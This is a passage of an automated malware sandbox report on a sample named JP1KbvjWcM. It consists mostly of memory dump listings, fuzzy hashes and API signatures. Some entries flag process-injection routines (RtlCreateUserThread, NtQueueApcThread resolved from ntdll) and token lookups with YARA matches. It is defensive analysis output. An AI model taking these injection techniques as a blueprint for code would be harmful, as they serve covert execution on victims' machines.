                  • Opcode Fuzzy Hash: fd4b1ce187cf5d2c7b3c7d1d5f2f485ec143d87fcb2d796d9dd721ce5a89571b
                  • Instruction Fuzzy Hash: EFD1B930714E2C4BF759BB6584EE7B972D2EB94304F10452DA44BC32EBDE36D80687A2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: fputcmemset
                  • String ID:
                  • API String ID: 947785774-0
                  • Opcode ID: 555f8774b8e81171a088c9ae3eef83ff67c5074706860f87334bd2843081a2d8
                  • Instruction ID: e5ba10496a4496e123422b110033c234012989d7016ac7815ec08934b7299dcf
                  • Opcode Fuzzy Hash: 555f8774b8e81171a088c9ae3eef83ff67c5074706860f87334bd2843081a2d8
                  • Instruction Fuzzy Hash: 49B1D6A2E1895186EB258E29D8043393A91BF087A4F1D4335DA1EBB7EDCE3CE941C741
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: freemallocstrchr$_errno
                  • String ID:
                  • API String ID: 4025974267-0
                  • Opcode ID: f35e4bf4a30ec4413237561f10dac7197b8990473e0b46e11b580f4fb44e5963
                  • Instruction ID: 16ce87273dcb52e014cd966505d55594e570efb61a7919a077fc54a542d34bbe
                  • Opcode Fuzzy Hash: f35e4bf4a30ec4413237561f10dac7197b8990473e0b46e11b580f4fb44e5963
                  • Instruction Fuzzy Hash: E281E930618EAC4FE7A5AB2C846D3F673D1FF99309F04016DD589C71ABDA36884783A1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                  • String ID:
                  • API String ID: 2887643383-0
                  • Opcode ID: f1c4e02295faa99f8843714657dd5281141177bf23df19fa39898597ddf49910
                  • Instruction ID: 74c90bb4224708072b02ce85cce120cfbabbded78929c3dd93076fabf246c93d
                  • Opcode Fuzzy Hash: f1c4e02295faa99f8843714657dd5281141177bf23df19fa39898597ddf49910
                  • Instruction Fuzzy Hash: EF518A31628E1C4FD749EB2894ED7B972D2FB88304F50466DE44BC32EBDD3599068792
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _lock$_calloc_crt_mtinitlocknum
                  • String ID:
                  • API String ID: 3962633935-0
                  • Opcode ID: b1e94c722dda090378a8e761eed7513b06593d91ccd6790d0d4411b736f80c7c
                  • Instruction ID: 3029ecca449db1b7af67232ab83e22aa6f2773ac9f077c3f823aba8647d1fe5f
                  • Opcode Fuzzy Hash: b1e94c722dda090378a8e761eed7513b06593d91ccd6790d0d4411b736f80c7c
                  • Instruction Fuzzy Hash: D8513530514F1D8FE718AF18C8D9376B3D0FB94318F11065DE88ACB7AADA75D8428792
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$_errno$_callnewhmalloc
                  • String ID:
                  • API String ID: 2761444284-0
                  • Opcode ID: 9dd44889f23309e2c133c4e883ac3d7c03cf28f4ebc62bcd805b5d39935d1e2d
                  • Instruction ID: 0334ba735a2d5a66103d0ae75d653b7fa72fde262c4bd3e03f2864f62ad4bcce
                  • Opcode Fuzzy Hash: 9dd44889f23309e2c133c4e883ac3d7c03cf28f4ebc62bcd805b5d39935d1e2d
                  • Instruction Fuzzy Hash: 91412930318F2D4BEB7A9E29589937A32C5E796358F10412DD48BC3297EE22D80347E6
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
                  • String ID:
                  • API String ID: 1812282339-0
                  • Opcode ID: 1d80507bd446d673e38c574efff92c11e3e4791c727a6c64fa90c2c2373988e9
                  • Instruction ID: 290d24ea0fcf772d1af32a50f45c1c2dc7aaa45b052ffaee75e433b7ff666e49
                  • Opcode Fuzzy Hash: 1d80507bd446d673e38c574efff92c11e3e4791c727a6c64fa90c2c2373988e9
                  • Instruction Fuzzy Hash: F741EA3131CF2D4AEB2C562C58AD33A72C3E795724F25032DE49AC76DADE12D85247D1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                  • String ID:
                  • API String ID: 304646821-0
                  • Opcode ID: c35e8c2de9f02937b40d8dcb44627bb11330896f7d068decc206105344bae12a
                  • Instruction ID: 2c5520d8cc9cd9ca4ce42085b84e20abc5552920fc3de47284196be8cd50b8fe
                  • Opcode Fuzzy Hash: c35e8c2de9f02937b40d8dcb44627bb11330896f7d068decc206105344bae12a
                  • Instruction Fuzzy Hash: CF51D330114E2C8FEB589F28C4EA776B7E1EF48314F140659D45ACFADAD636C84187A0
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 761449704-0
                  • Opcode ID: faf2166294d0965833cb84c6e7fe882f3c5ed13ceeefabe40a4c11aee224dca5
                  • Instruction ID: ea1e94a6a91a59111862eada1f5defc32bda57cad67709c38d5601d444b370ea
                  • Opcode Fuzzy Hash: faf2166294d0965833cb84c6e7fe882f3c5ed13ceeefabe40a4c11aee224dca5
                  • Instruction Fuzzy Hash: 9041B03070CE5C4FE699AB2C686D3B877D2E799314F548659D08EC32ABDA35DC0287A1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                  • Instruction ID: 8af5d18fa59db06f934ac98c290b1635b4bfe7bde92454b62cbe923d6e2b2488
                  • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                  • Instruction Fuzzy Hash: 6651EF72B04EA095FB19FB65C8893ED2360FF94B8CF489115EE092769ADF39C549C700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 1640621425-0
                  • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                  • Instruction ID: 376ccb07e09edf46f40bea9e2dc73f11389b09aa5a1cbd6b971b8c012204b951
                  • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                  • Instruction Fuzzy Hash: 1A41D431300FF046FA7E9E665D4835AB699BF84FFCF1C42209E964F6D9D63AD4918600
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$_errno$_callnewhmalloc$AllocHeap
                  • String ID:
                  • API String ID: 996410232-0
                  • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                  • Instruction ID: 42037b145d584534cd86a56254cc105894acd7a6a72c29eb21d26dbe4e3546eb
                  • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                  • Instruction Fuzzy Hash: 9141C432208FF546EF1AEB265C1866E6799BF95BCCF8D4024DD694B749DE3AC406C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                  • String ID: %s&%s$?%s
                  • API String ID: 1095232423-1750478248
                  • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                  • Instruction ID: 62e9ad349d0eb7a9fb999a8719def877358d0533af8c44eba319d8c6505ba933
                  • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                  • Instruction Fuzzy Hash: C741A372200ED091EA29AF2ED5492E8A3A0FFD8B9DF085511DF4917B65EF35D1A7C340
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                  • String ID:
                  • API String ID: 2998201375-0
                  • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                  • Instruction ID: 290ce71699e204f5fcd6fc463ac8d882cfbf1b6b9ad74c24afe1c18e7ce20176
                  • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                  • Instruction Fuzzy Hash: B441F432201BD086E7798F14D98836D7BA1FF84BACF5C4161EB8A5BB9DCB39C8418700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$free$_callnewhfclosefwritemalloc
                  • String ID:
                  • API String ID: 1696598829-0
                  • Opcode ID: 847eb6b7486c9ee4865d8d7c518a95bf0648219dea0f29af020a53809fe39c03
                  • Instruction ID: e5fd30c2bc531c82e3c85e7f4fad1be752d5ab794b4c1539001a7f10c38f8be2
                  • Opcode Fuzzy Hash: 847eb6b7486c9ee4865d8d7c518a95bf0648219dea0f29af020a53809fe39c03
                  • Instruction Fuzzy Hash: 6F218330228E2C4BE745F72985AD3BD76D1FB98358F54452D644EC32EADD29CD0183A2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno_errno
                  • String ID:
                  • API String ID: 2964073243-0
                  • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                  • Instruction ID: 74f4d49ddb2565f25e7426127e1fc758c0e6a6b95a839dfe687a68a0cceff96d
                  • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                  • Instruction Fuzzy Hash: D801F930124C6D4EF6587764CCE93B672A2FF8132DF554254E019CFADBD67A44408771
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno_errno
                  • String ID:
                  • API String ID: 2964073243-0
                  • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                  • Instruction ID: c523987e044953d512350091b5624abebe44e2bbd54fa497d4f05ca5f382578f
                  • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                  • Instruction Fuzzy Hash: 2301D172602EF445FA2E6B64CC893AC2560BF51B3DFED4340D52A0E3EAC62AC4524610
                  APIs
                  • VirtualProtect.KERNEL32(00007FF65B3BC0B0,00007FF65B3BC0B8,00000001,?,?,?,?,00007FFE2167ADA0,00007FF65B3B1228,?,?,?,00007FF65B3B13E6), ref: 00007FF65B3B1EAD
                  Strings
                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF65B3B1F17
                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF65B3B1FF2
                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF65B3B1FFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                  • API String ID: 544645111-1286557213
                  • Opcode ID: 3f5ecf0c864aea2a70ecd982c90d4553c0d8b705a79e49b9268a78e357bff83a
                  • Instruction ID: 99531ebfc4b0df1ac283a177240a087a7f3db6382b8a6d9d51b14a2df7e9d5b4
                  • Opcode Fuzzy Hash: 3f5ecf0c864aea2a70ecd982c90d4553c0d8b705a79e49b9268a78e357bff83a
                  • Instruction Fuzzy Hash: 4F917E32E29D5686EA208B25D9402796291BF5D7A4F6C8335DD2DB77FCDF2CE842D200
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %s!%s
                  • API String ID: 0-2935588013
                  • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                  • Instruction ID: ebad6af699bc4316e5c28f96ef43c368a0277ddd14702ce3348eae261fbecd5a
                  • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                  • Instruction Fuzzy Hash: 25516576204FE086EB689F55D80875973A1FB88B9CF484126DF9B4778DDB39C942C704
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$CreateInfoPipeSleepStartup
                  • String ID: h
                  • API String ID: 1809008225-2439710439
                  • Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                  • Instruction ID: 3a02014222ebd22e2e6e58d771dcaee045a113bcdd21c6435098459ce8e32407
                  • Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
                  • Instruction Fuzzy Hash: 0741A832600F989AE310DF65E84468EB7B0F78879CF104205EE9C53BA8DF39C546CB40
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: signal
                  • String ID: CCG
                  • API String ID: 1946981877-1584390748
                  • Opcode ID: 6073a758f237ae6f803d3cf6a55fdba62ff33d07738ec308fd8f7cf96dd68a23
                  • Instruction ID: b8801e286975ba4a9772c4fcdd35f1c31d46e5e16b74655255d3f7d857af8660
                  • Opcode Fuzzy Hash: 6073a758f237ae6f803d3cf6a55fdba62ff33d07738ec308fd8f7cf96dd68a23
                  • Instruction Fuzzy Hash: 37218961E09E0646FE682A69CC943781982AF8D354F1D8A35CA2DF63FDDD2DE8C1C211
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AccountInformationLookupToken_snprintf
                  • String ID: %s\%s
                  • API String ID: 2107350476-4073750446
                  • Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                  • Instruction ID: d886de8e7ad4598f387ed8e581c0ca0917344b392fb351001d4fd3c6745016e1
                  • Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
                  • Instruction Fuzzy Hash: B8312F36204FD195EB38DF61E8446DA73A8FB88B8CF488125EA8D57B59DF39C606C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: RtlCreateUserThread$ntdll.dll
                  • API String ID: 1646373207-2935400652
                  • Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                  • Instruction ID: 8acea0e09225c5f760119ea72def34017dd6e67b6dc2657b09ca5933d5801b2a
                  • Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
                  • Instruction Fuzzy Hash: 88112D32214F9092DB24DF51F884549B7B8FB98B88F9D8235EA9D43B18DF39C556C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: NtQueueApcThread$ntdll
                  • API String ID: 1646373207-1374908105
                  • Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                  • Instruction ID: 02af006c49ff81cf29e62c8f76fbe2aee1d9a7c97b20022f03d7967bde35e82c
                  • Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
                  • Instruction Fuzzy Hash: E3018435200F9192EA049B52FC5825AA7A0FB99BD8F584626DE6843B58DF39C4628300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
